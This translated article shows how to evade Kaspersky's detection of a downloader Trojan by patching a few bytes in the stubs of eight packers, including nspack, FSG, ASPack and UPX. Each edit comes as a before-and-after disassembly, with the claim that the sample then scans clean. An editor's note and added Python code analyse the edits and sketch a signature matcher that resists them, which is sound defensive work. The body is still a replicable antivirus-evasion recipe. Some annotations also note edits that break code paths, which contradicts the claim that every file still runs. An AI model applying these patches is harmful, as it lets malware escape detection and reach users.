Modify only the packer stub header and Kaspersky falls silent

Source: Internet
Author: User
Introduction: among the many anti-virus products, Kaspersky has a good reputation among users, and many say its virtual-machine unpacking technology is very strong. Yet with only a small adjustment to the usual packing step, nothing more than editing a few bytes of the packer's header, Kaspersky was left speechless.

"Look, do you think I don't know you when you wear a vest ?" This line is familiar. Now users use this sentence to describe the anti-virus vendor's shelling technology. The emergence of this technology is closely related to the "shelling" technology used by virus programmers.

As everyone knows, packing means transforming the bytes of an executable or DLL through a series of mathematical operations, either to shrink the file or to encrypt the program code. When the packed file runs, the packer's stub executes first, restores the original program in memory, and then transfers control to it. All of this happens automatically; the user does not see the stub run, and in general a packed program behaves exactly like the unpacked one.

Faced with virus writers packing their viruses, anti-virus vendors naturally adopted unpacking. The general unpacking procedure is: identify the packer, find the OEP (original entry point), dump the restored image from memory, and repair it (imports and the like). Unpacking capability has become an important measure of an anti-virus product's detection ability.

So a new round of the game between virus writers and anti-virus vendors is played out between two symbiotic technologies: packing and unpacking.


I picked a foreign downloader, Deception 4.0 (DT), from the Internet at random. Kaspersky had to detect it, otherwise the test would be meaningless. Only a handful of values in the packed DT are changed, yet Kaspersky reports nothing, and the same edit applied to other executables packed the same way behaves alike. The modified program must still run correctly, otherwise the modification is pointless. Now to work: the eight most common packers were prepared.

I. nspack 3.6

Load the nspack-packed DT in OllyDbg (OD) and copy the first dozen lines. The instructions to be modified were shown in bold blue in the original; here they are simply the lines that differ from the second listing:
004cf302     E8 00000000      CALL copy_(2).004cf307
004cf307     5D               POP EBP
004cf308     83ED 07          SUB EBP,7
004cf30b     8D85 0CFFFFFF    LEA EAX,DWORD PTR SS:[EBP-F4]
004cf311     8338 01          CMP DWORD PTR DS:[EAX],1
004cf314     0F84 47020000    JE copy_(2).004cf561
004cf31a     C700 01000000    MOV DWORD PTR DS:[EAX],1
004cf320     8BD5             MOV EDX,EBP
004cf322     2B95 A0FEFFFF    SUB EDX,DWORD PTR SS:[EBP-160]
004cf328     8995 A0FEFFFF    MOV DWORD PTR SS:[EBP-160],EDX
004cf32e     0195 D0FEFFFF    ADD DWORD PTR SS:[EBP-130],EDX
004cf334     8DB5 14FFFFFF    LEA ESI,DWORD PTR SS:[EBP-EC]
004cf33a     0116             ADD DWORD PTR DS:[ESI],EDX

Change them to the following (the changed lines were marked red in the original):
004cf302     E8 00000000      CALL copy_(2).004cf307
004cf307     5D               POP EBP
004cf308     83C5 F9          ADD EBP,-7
004cf30b     8D85 0CFFFFFF    LEA EAX,DWORD PTR SS:[EBP-F4]
004cf311     8338 01          CMP DWORD PTR DS:[EAX],1
004cf314     0F84 47020000    JE copy_(2).004cf561
004cf31a     C700 01000000    MOV DWORD PTR DS:[EAX],1
004cf320     8BD5             MOV EDX,EBP
004cf322     2B95 A0FEFFFF    SUB EDX,DWORD PTR SS:[EBP-160]
004cf328     8995 A0FEFFFF    MOV DWORD PTR SS:[EBP-160],EDX
004cf32e     1195 D0FEFFFF    ADC DWORD PTR SS:[EBP-130],EDX
004cf334     8DB5 14FFFFFF    LEA ESI,DWORD PTR SS:[EBP-EC]
004cf33a     1116             ADC DWORD PTR DS:[ESI],EDX
Save the file and scan it with Kaspersky: nothing is reported. Note exactly what changed. SUB EBP,7 became ADD EBP,-7, which is one opcode byte and a negated immediate (83 ED 07 versus 83 C5 F9), and the two ADDs became ADCs (opcode 01 versus 11). The values computed are identical; only the carry flag differs, and ADC adds that flag in. So the substitution is only safe where CF is known to be clear: the ADC at 004cf32e takes its carry from the SUB EDX at 004cf322 (the LEA and MOV in between do not touch the flags), and the ADC at 004cf33a takes it from the ADC at 004cf32e.
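The effect of these substitutions on register values and on a byte signature can be checked without a debugger. The following Python is an added example, not code from the article: it models the three changed instructions of the nspack 3.6 stub with a minimal 32-bit ALU (result plus carry flag), feeds them constructed memory values to show where ADC stops being equal to ADD, and runs a naive fixed-offset byte signature over the original and edited stub heads. The stub bytes are the encodings of the instructions listed above; the memory contents, and the assumption that [EBP-160] holds a link-time address, are the example's own.

```python
"""Added example, not code from the article: a minimal 32-bit ALU model of the
nspack 3.6 edits (SUB->ADD with negated immediate, ADD->ADC) and a plain byte
signature of the kind the article suspects Kaspersky uses.  The stub bytes are
the encodings of the listed instructions; the memory values fed to the model
are constructed, not read from the real stub."""

MASK = 0xFFFFFFFF


def x86_add(a, b, cf=0):
    """ADD r/m32 -> (result, CF); CF is the unsigned carry out, cf is ignored."""
    r = (a & MASK) + (b & MASK)
    return r & MASK, int(r > MASK)


def x86_adc(a, b, cf):
    """ADC r/m32: like ADD, but the incoming carry is added as well."""
    r = (a & MASK) + (b & MASK) + cf
    return r & MASK, int(r > MASK)


def x86_sub(a, b, cf=0):
    """SUB r/m32 -> (result, CF); CF is the unsigned borrow, cf is ignored."""
    r = (a & MASK) - (b & MASK)
    return r & MASK, int(r < 0)


EBP_AFTER_POP = 0x004CF307        # 'CALL $+5 ; POP EBP' leaves this in EBP


def delta_base(modified):
    """004cf308: SUB EBP,7 (original) versus ADD EBP,-7 (modified).
    Same EBP either way, but CF differs: no borrow for SUB, a carry for ADD."""
    if modified:
        return x86_add(EBP_AFTER_POP, -7)
    return x86_sub(EBP_AFTER_POP, 7)


def fixup_slot(slot, ebp, stored, modified):
    """Model of 004cf322..004cf32e: EDX = EBP - [EBP-160]; [EBP-130] += EDX.
    'slot' is the dword at [EBP-130], 'stored' the dword at [EBP-160].  The CF
    that the ADC consumes is the borrow of that SUB (LEA/MOV do not touch
    flags).  Assumption, not stated by the article: 'stored' is the address the
    stub was linked at, so EDX is a load delta and CF is set only when the image
    is loaded below that address."""
    edx, cf = x86_sub(ebp, stored)
    return (x86_adc if modified else x86_add)(slot, edx, cf)[0]


# Encodings of the thirteen instructions in the listing above.
NSPACK36_ORIGINAL = bytes.fromhex(
    "E800000000"     # CALL $+5
    "5D"             # POP EBP
    "83ED07"         # SUB EBP,7
    "8D850CFFFFFF"   # LEA EAX,[EBP-F4]
    "833801"         # CMP DWORD [EAX],1
    "0F8447020000"   # JE 004CF561
    "C70001000000"   # MOV DWORD [EAX],1
    "8BD5"           # MOV EDX,EBP
    "2B95A0FEFFFF"   # SUB EDX,[EBP-160]
    "8995A0FEFFFF"   # MOV [EBP-160],EDX
    "0195D0FEFFFF"   # ADD [EBP-130],EDX
    "8DB514FFFFFF"   # LEA ESI,[EBP-EC]
    "0116"           # ADD [ESI],EDX
)
NSPACK36_MODIFIED = (
    NSPACK36_ORIGINAL[:6] + bytes.fromhex("83C5F9")              # ADD EBP,-7
    + NSPACK36_ORIGINAL[9:44] + bytes.fromhex("1195D0FEFFFF")   # ADC [EBP-130],EDX
    + NSPACK36_ORIGINAL[50:56] + bytes.fromhex("1116")          # ADC [ESI],EDX
)


def exact_signature_hits(sample, signature):
    """A fixed byte pattern anchored at the packer entry point."""
    return sample[:len(signature)] == signature


def differing_offsets(a, b):
    """Offsets at which two equal-length stub heads differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


if __name__ == "__main__":
    print(delta_base(False), delta_base(True))                # same EBP, CF 0 then 1
    print(differing_offsets(NSPACK36_ORIGINAL, NSPACK36_MODIFIED))   # [7, 8, 44, 56]
    head = NSPACK36_ORIGINAL[:9]
    print(exact_signature_hits(NSPACK36_ORIGINAL, head),
          exact_signature_hits(NSPACK36_MODIFIED, head))        # True False
    # loaded 0x100000 below the assumed link address: ADD and ADC now disagree
    print(hex(fixup_slot(0x401000, 0x003CF300, 0x004CF300, False)),
          hex(fixup_slot(0x401000, 0x003CF300, 0x004CF300, True)))
```

Four bytes out of fifty-eight differ, which is enough to miss an exact signature, and the last `fixup_slot` call shows the price of the ADC substitution: at the preferred base or above it the two variants agree, but an image loaded below the assumed link address makes the SUB borrow and the ADC then adds one.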

II. FSG 2.0

Load the FSG 2.0-packed DT in OD and copy the first dozen lines:
00400154 F>  8725 2C115300    XCHG DWORD PTR DS:[53112C],ESP
0040015a     61               POPAD
0040015b     94               XCHG EAX,ESP
0040015c     55               PUSH EBP
0040015d     A4               MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
0040015e     B6 80            MOV DH,80
00400160     FF13             CALL DWORD PTR DS:[EBX]
00400162   ^ 73 F9            JNB SHORT fsg2_0.0040015d
00400164     33C9             XOR ECX,ECX
00400166     FF13             CALL DWORD PTR DS:[EBX]
00400168     73 16            JNB SHORT fsg2_0.00400180
0040016a     33C0             XOR EAX,EAX

After modification:
00400154 F>  8725 2C115300    XCHG DWORD PTR DS:[53112C],ESP
0040015a     61               POPAD
0040015b     94               XCHG EAX,ESP
0040015c     55               PUSH EBP
0040015d     A4               MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
0040015e     B6 80            MOV DH,80
00400160     FF13             CALL DWORD PTR DS:[EBX]
00400162   ^ 77 F9            JA SHORT fsg2_0.0040015d
00400164     33C9             XOR ECX,ECX
00400166     FF13             CALL DWORD PTR DS:[EBX]
00400168     77 16            JA SHORT fsg2_0.00400180
0040016a     33C0             XOR EAX,EAX
Scan with Kaspersky: no virus is reported. JNB (taken when CF=0) became JA (taken when CF=0 and ZF=0), so the branch is now decided by both flags as the routine called through [EBX] leaves them. The modified file only keeps working because that routine never returns with CF clear and ZF set.

III. WinUpack

Load the WinUpack-packed DT in OD; the first lines are:
00526740 W>  60               PUSHAD
00526741     E8 09000000      CALL winupack.0052674f
00526746     BE 651200E9      MOV ESI,E9001265
0052674b     06               PUSH ES
0052674c     0200             ADD AL,BYTE PTR DS:[EAX]
0052674e     0033             ADD BYTE PTR DS:[EBX],DH
00526750     C9               LEAVE
00526751     5E               POP ESI
00526752     870E             XCHG DWORD PTR DS:[ESI],ECX
00526754   ^ E3 F4            JECXZ SHORT winupack.0052674a
00526756     2BF1             SUB ESI,ECX
00526758     8BDE             MOV EBX,ESI
0052675a     AD               LODS DWORD PTR DS:[ESI]
0052675b     2BD8             SUB EBX,EAX
0052675d     AD               LODS DWORD PTR DS:[ESI]

The modifications are as follows:
00526740 W>  60               PUSHAD
00526741     E8 09000000      CALL winupack.0052674f
00526746     BE 651200E9      MOV ESI,E9001265
0052674b     06               PUSH ES
0052674c     1200             ADC AL,BYTE PTR DS:[EAX]
0052674e     1033             ADC BYTE PTR DS:[EBX],DH
00526750     C9               LEAVE
00526751     5E               POP ESI
00526752     870E             XCHG DWORD PTR DS:[ESI],ECX
00526754   ^ E3 F4            JECXZ SHORT winupack.0052674a
00526756     1BF1             SBB ESI,ECX
00526758     8BDE             MOV EBX,ESI
0052675a     AD               LODS DWORD PTR DS:[ESI]
0052675b     1BD8             SBB EBX,EAX
0052675d     AD               LODS DWORD PTR DS:[ESI]
Scan with Kaspersky: no virus is reported. Two things to be aware of in this stub. The CALL at 00526741 lands at 0052674f, inside the instruction shown at 0052674e, where the bytes 33 C9 are XOR ECX,ECX; that clears CF, so SBB ESI,ECX equals SUB ESI,ECX, but the second SBB at 0052675b consumes the borrow of the first. And the JECXZ at 00526754 targets 0052674a, the E9 byte that ends the MOV's immediate, so the bytes 06 02 00 00 at 0052674b-0052674e also serve as the displacement of that JMP; with 12 and 10 in place of 02 and 00 the displacement becomes 10001206 and that path no longer leads anywhere inside the image.

IV. ASPack

Same procedure: load in OD and copy the first dozen lines. Note that after loading you have to scroll up one line, because the entry point is at 004cc001 and there is a byte before it:
004cc000     90               NOP
004cc001 A>  60               PUSHAD
004cc002     E8 03000000      CALL asp.004cc00a
004cc007   - E9 EB045D45      JMP 45a9c4f7
004cc00c     55               PUSH EBP
004cc00d     C3               RETN
004cc00e     E8 01000000      CALL asp.004cc014
004cc013     EB 5D            JMP SHORT asp.004cc072
004cc015     BB EDFFFFFF      MOV EBX,-13
004cc01a     03DD             ADD EBX,EBP
004cc01c     81EB 00C00C00    SUB EBX,0CC000
004cc022     83BD 22040000 00 CMP DWORD PTR SS:[EBP+422],0

The modification is as follows:
004cc000     60               PUSHAD
004cc001 A>  90               NOP
004cc002     E8 03000000      CALL asp.004cc00a
004cc007     E8 EB045D45      CALL 45a9c4f7
004cc00c     55               PUSH EBP
004cc00d     C3               RETN
004cc00e     E8 01000000      CALL asp.004cc014
004cc013     73 5D            JNB SHORT asp.004cc072
004cc015     BB EDFFFFFF      MOV EBX,-13
004cc01a     11EB             ADC EBX,EBP
004cc01c     81C3 0040F3FF    ADD EBX,FFF34000
004cc022     83BD 22040000 00 CMP DWORD PTR SS:[EBP+422],0
Scan with Kaspersky: no virus is reported. Two of these edits touch bytes that are never executed as opcodes: CALL 004cc00a lands on the fourth byte of the five-byte instruction at 004cc007, and CALL 004cc014 lands on the second byte of the two-byte instruction at 004cc013, so E9 to E8 and EB to 73 only change what the disassembler, and a byte signature, see. ADD EBX,EBP to ADC EBX,EBP and SUB EBX,0CC000 to ADD EBX,FFF34000 preserve the values as in section I. Note also that the entry-point marker stays on 004cc001, so the PUSHAD moved to 004cc000 only executes if the entry point is moved there too.

V. JDPack

This is the most involved modification. The result is barely recognisable, but it still runs. Before modification:
004cc000 copy>  60               PUSHAD
004cc001        E8 00000000      CALL copy_(8).004cc006
004cc006        5D               POP EBP
004cc007        8BD5             MOV EDX,EBP
004cc009        81ED C62B4000    SUB EBP,copy_(8).00402bc6
004cc00f        2B95 61344000    SUB EDX,DWORD PTR SS:[EBP+403461]
004cc015        81EA 06000000    SUB EDX,6
004cc01b        8995 65344000    MOV DWORD PTR SS:[EBP+403465],EDX
004cc021        83BD 69344000 00 CMP DWORD PTR SS:[EBP+403469],0

Modified:
004cc000 copy>  90               NOP
004cc001        E8 00000000      CALL copy_(8).004cc006
004cc006        5D               POP EBP
004cc007        8BC5             MOV EAX,EBP
004cc009        8BD0             MOV EDX,EAX
004cc00b        81ED C62B4000    SUB EBP,copy_(8).00402bc6
004cc011        2B95 61344000    SUB EDX,DWORD PTR SS:[EBP+403461]
004cc017        83C2 FA          ADD EDX,-6
004cc01a        8995 65344000    MOV DWORD PTR SS:[EBP+403465],EDX
004cc020        90               NOP
004cc021        83BD 69344000 00 CMP DWORD PTR SS:[EBP+403469],0
Admittedly this one is hard to look at, but you can also drop the NOP in front of 004cc021 and assemble a single instruction into the space. The layout works because the extra MOV (two bytes) and the NOP (one byte) exactly make up for SUB EDX,6 shrinking from six bytes to three as ADD EDX,-6. Note that the NOP at 004cc000 replaces the PUSHAD at the entry point and that MOV EAX,EBP clobbers EAX, both of which this stub evidently tolerates, since the file still runs.

VI. UPX

UPX is the classic free compressor. Load the UPX-packed file in OD. Before modification:
004ce240 copy>  60               PUSHAD
004ce241        BE 00504700      MOV ESI,copy_(2).00475000
004ce246        8DBE 00C0F8FF    LEA EDI,DWORD PTR DS:[ESI+FFF8C000]
004ce24c        C787 0CA70800 A5> MOV DWORD PTR DS:[EDI+8A70C],59AD25>
004ce256        57               PUSH EDI
004ce257        83CD FF          OR EBP,FFFFFFFF
004ce25a        EB 0E            JMP SHORT copy_(2).004ce26a
004ce25c        90               NOP
004ce25d        90               NOP
004ce25e        90               NOP
004ce25f        90               NOP
004ce260        8A06             MOV AL,BYTE PTR DS:[ESI]

After modification:
004ce240 copy>  60               PUSHAD
004ce241        BE 00504700      MOV ESI,copy_(2).00475000
004ce246        8DBE 00C0F8FF    LEA EDI,DWORD PTR DS:[ESI+FFF8C000]
004ce24c        C787 0CA70800 A5> MOV DWORD PTR DS:[EDI+8A70C],59AD25>
004ce256        57               PUSH EDI
004ce257        83CD FF          OR EBP,FFFFFFFF
004ce25a        77 0E            JA SHORT copy_(2).004ce26a
004ce25c        73 0C            JNB SHORT copy_(2).004ce26a
004ce25e        72 0A            JB SHORT copy_(2).004ce26a
004ce260        8A06             MOV AL,BYTE PTR DS:[ESI]
Scan with Kaspersky: no virus is reported. This one is exact. OR EBP,FFFFFFFF immediately before clears CF and leaves ZF clear (the result is non-zero), so JA 004ce26a is always taken; and even if it were not, JNB and JB between them cover every CF state. The three conditional jumps occupy six bytes, the same as JMP SHORT plus four NOPs, so nothing else moves.

VII. nspack 1.1

Its stub is clearly different from version 3.6, so it gets its own change, the simplest of the lot, and Kaspersky no longer lets out its ugly alarm. In OD:
004cf600 Fu>  9C               PUSHFD
004cf601      60               PUSHAD
004cf602      E8 00000000      CALL copy_(4).004cf607
004cf607      5D               POP EBP

Modify as follows:
004cf600 Fu>  9C               PUSHFD
004cf601      60               PUSHAD
004cf602      68 07F64C00      PUSH copy_(4).004cf607
004cf607      5D               POP EBP
CALL $+5 and PUSH 004cf607 both leave 004cf607 on the stack for the POP EBP, but the CALL is position-independent while the PUSH hard-codes the address: if the image is loaded at anything other than its preferred base, EBP gets the wrong value and every EBP-relative address in the stub is off.

VIII. kbys 0.28 (Beibei compression)

This packer compresses as well as UPX but is far less well known. Once a file is packed with it, Kaspersky flags it without fail; after a simple modification, Kaspersky goes quiet. Load in OD; the first four lines are:
00401000 copy>  68 FDD14C00      PUSH copy_(5).004cd1fd
00401005        E8 01000000      CALL copy_(5).0040100b        ; entry address

0040100a  \.    C3               RETN
0040100b  $     C3               RETN

Modify as follows:
00401000 copy>  E8 F8C10C00      CALL copy_(5).004cd1fd
00401005        68 0B104000      PUSH copy_(5).0040100b        ; entry address

0040100a  \.    C3               RETN
0040100b  $     C3               RETN
The original PUSH/CALL/RETN/RETN is an obfuscated jump to 004cd1fd: the CALL lands on a RETN, which returns to the RETN at 0040100a, which pops the pushed address. The modified CALL reaches 004cd1fd directly but leaves 00401005 on the stack as an extra return address when the stub starts.
All eight packers listed above were handled by simple modifications of the packer header alone, and that silenced Kaspersky, whose so-called virtual-machine unpacking is regarded as world-class. Its proactive defence was left aside; the test covered file scanning and removal only.

From this it appears that Kaspersky stores packer signatures in its database, like virus patterns, and then hands the file to its unpacking engine for scanning. If so, the signatures of many packers, compressors especially, lie only in the stub header. For some encryption (protection) packers, modifying the header is useless. This is only speculation.
Editor: with simple modifications the author has evaded Kaspersky's detection of a Downloader that it previously detected. In fact many hackers modify their Trojan servers in this way to keep them from being detected by anti-virus software. This article uses Kaspersky as the example, but I believe most well-known anti-virus products would run into the same problem. The editor believes anti-virus software should not simply recognise the header of a packer but should use composite packer signatures, which would raise the detection strength. Moreover, the kbys compressor exposes a defect: Kaspersky detected the packed executable, but after unpacking it does not seem to be detected, so as long as the packer goes undetected the packed file goes undetected too, and the detection is not thorough. Also, during the modification it was found that Kaspersky is noticeably stronger at detecting some encryption packers. It seems Kaspersky treats different kinds of packers differently, but anti-virus software ought to treat them all the same.
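One way to make a stub signature survive edits of this kind, in the spirit of the composite-signature suggestion above, is to compare canonical instruction encodings rather than raw bytes. The following Python is an added example and is not the article's, the editor's, or any vendor's code: it decodes only the x86 instruction forms that occur in the listings, rewrites ADC to ADD, SBB to SUB, ADD with a negative immediate to SUB, two-register operands into a single direction, and any short conditional jump into one class, then matches the result against a signature treated the same way. The stub bytes are the encodings of the listed instructions; the UPX sample is included to show a substitution this normalisation does not fold.

```python
"""Added example, not from the article or any vendor: a scanner that
canonicalises 'flag twin' encodings before matching a packer signature, so the
ADD/ADC, SUB/SBB, negated-immediate and short-Jcc swaps shown above fold back
onto the original stub bytes.  The decoder covers only the instruction forms
that appear in the listings; anything else is left undecoded."""

ALU_RM = {op for op in range(0x40) if op & 7 < 4}      # ADD/OR/ADC/SBB/AND/SUB/XOR/CMP r/m forms
ALU_AL = {op for op in range(0x40) if op & 7 == 4}     # ... AL,imm8
ALU_EAX = {op for op in range(0x40) if op & 7 == 5}    # ... EAX,imm32
MODRM_OPS = ALU_RM | {0x87, 0x89, 0x8A, 0x8B, 0x8D, 0xFF}
ONE_BYTE = {0x06, 0x90, 0x94, 0x9C, 0xA4, 0xAD, 0xC3, 0xC9} | set(range(0x50, 0x62))
TWIN = {**{op: op ^ 0x10 for op in range(0x10, 0x16)},   # ADC -> ADD
        **{op: op ^ 0x30 for op in range(0x18, 0x1E)}}   # SBB -> SUB


def _modrm_len(b, i):
    """Bytes used by the ModRM at b[i] plus its SIB/displacement (32-bit mode)."""
    mod, rm = b[i] >> 6, b[i] & 7
    if mod == 3:
        return 1
    n = 1
    if rm == 4:                                   # SIB present
        n += 1
        if mod == 0 and (b[i + 1] & 7) == 5:      # [disp32 + index*scale]
            n += 4
    if mod == 1:
        n += 1
    elif mod == 2 or (mod == 0 and rm == 5):
        n += 4
    return n


def insn_len(b, i):
    """Length of the instruction at b[i]; ValueError for opcodes outside the subset."""
    op = b[i]
    if op in ONE_BYTE:
        return 1
    if 0x70 <= op <= 0x7F or op in (0xEB, 0xE3) or op in ALU_AL or 0xB0 <= op <= 0xB7:
        return 2
    if op in (0xE8, 0xE9, 0x68) or op in ALU_EAX or 0xB8 <= op <= 0xBF:
        return 5
    if op == 0x0F and 0x80 <= b[i + 1] <= 0x8F:   # Jcc rel32
        return 6
    if op in MODRM_OPS:
        return 1 + _modrm_len(b, i + 1)
    if op in (0x80, 0x83):                        # grp1 r/m, imm8
        return 1 + _modrm_len(b, i + 1) + 1
    if op in (0x81, 0xC7):                        # grp1 r/m, imm32 ; MOV r/m32, imm32
        return 1 + _modrm_len(b, i + 1) + 4
    raise ValueError("opcode %02X at offset %d is outside this decoder" % (op, i))


def canonical(b):
    """Rewrite b instruction by instruction into a flag-insensitive form."""
    out, i = bytearray(), 0
    while i < len(b):
        try:
            n = insn_len(b, i)
            if i + n > len(b):
                raise IndexError
        except (ValueError, IndexError):
            out += b[i:]                          # undecodable tail kept verbatim
            break
        ins = bytearray(b[i:i + n])
        op = ins[0]
        if op in ALU_RM and op & 2 and ins[1] >> 6 == 3:   # reg,reg in r,r/m direction:
            reg, rm = (ins[1] >> 3) & 7, ins[1] & 7        # rewrite as the r/m,r form
            ins[0] = op = op & ~2
            ins[1] = 0xC0 | (rm << 3) | reg
        if op in TWIN:
            ins[0] = TWIN[op]
        elif op in (0x80, 0x81, 0x83):
            k = 4 if op == 0x81 else 1
            reg = {2: 0, 3: 5}.get((ins[1] >> 3) & 7, (ins[1] >> 3) & 7)  # /2->/0, /3->/5
            if reg == 0:                                   # ADD r/m,-x  ->  SUB r/m,x
                imm = int.from_bytes(ins[-k:], "little")
                if imm >> (8 * k - 1):
                    reg, ins[-k:] = 5, ((-imm) & ((1 << 8 * k) - 1)).to_bytes(k, "little")
            ins[1] = ins[1] & 0xC7 | reg << 3
        elif 0x70 <= op <= 0x7F:
            ins[0] = 0x70                                  # any short Jcc
        out += ins
        i += n
    return bytes(out)


def signature_hits(sample, signature):
    """Match canonical forms; only a signature-length prefix of the sample is decoded."""
    return canonical(sample[:len(signature)]) == canonical(signature)


# Listing bytes from sections I, II, IV and VI (encodings of the instructions shown).
NSPACK36_ORIGINAL = bytes.fromhex(
    "E800000000 5D 83ED07 8D850CFFFFFF 833801 0F8447020000 C70001000000"
    " 8BD5 2B95A0FEFFFF 8995A0FEFFFF 0195D0FEFFFF 8DB514FFFFFF 0116")
NSPACK36_MODIFIED = bytes.fromhex(
    "E800000000 5D 83C5F9 8D850CFFFFFF 833801 0F8447020000 C70001000000"
    " 8BD5 2B95A0FEFFFF 8995A0FEFFFF 1195D0FEFFFF 8DB514FFFFFF 1116")
FSG20_ORIGINAL = bytes.fromhex("87252C115300 61 94 55 A4 B680 FF13 73F9 33C9 FF13 7316 33C0")
FSG20_MODIFIED = bytes.fromhex("87252C115300 61 94 55 A4 B680 FF13 77F9 33C9 FF13 7716 33C0")
ASPACK_ORIGINAL = bytes.fromhex("03DD 81EB00C00C00")      # ADD EBX,EBP ; SUB EBX,0CC000
ASPACK_MODIFIED = bytes.fromhex("11EB 81C30040F3FF")      # ADC EBX,EBP ; ADD EBX,FFF34000
UPX_ORIGINAL = bytes.fromhex("EB0E 90909090")             # JMP SHORT ; NOP x4
UPX_MODIFIED = bytes.fromhex("770E 730C 720A")            # JA / JNB / JB to the same target

if __name__ == "__main__":
    for name, a, b in (("nspack", NSPACK36_ORIGINAL, NSPACK36_MODIFIED),
                       ("fsg", FSG20_ORIGINAL, FSG20_MODIFIED),
                       ("aspack", ASPACK_ORIGINAL, ASPACK_MODIFIED),
                       ("upx", UPX_ORIGINAL, UPX_MODIFIED)):
        print(name, "raw equal:", a == b, "canonical equal:", canonical(a) == canonical(b))
```

The nspack, FSG and ASPack edits all collapse onto the original bytes, so a signature built from the unmodified stub hits again. The UPX edit (JMP SHORT plus NOPs rewritten as JA/JNB/JB) and the JDPack edit, which changes instruction boundaries, still defeat this matcher; for those a signature that wildcards the opcode bytes, or a composite pattern anchored on more than the first dozen stub bytes, is needed.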
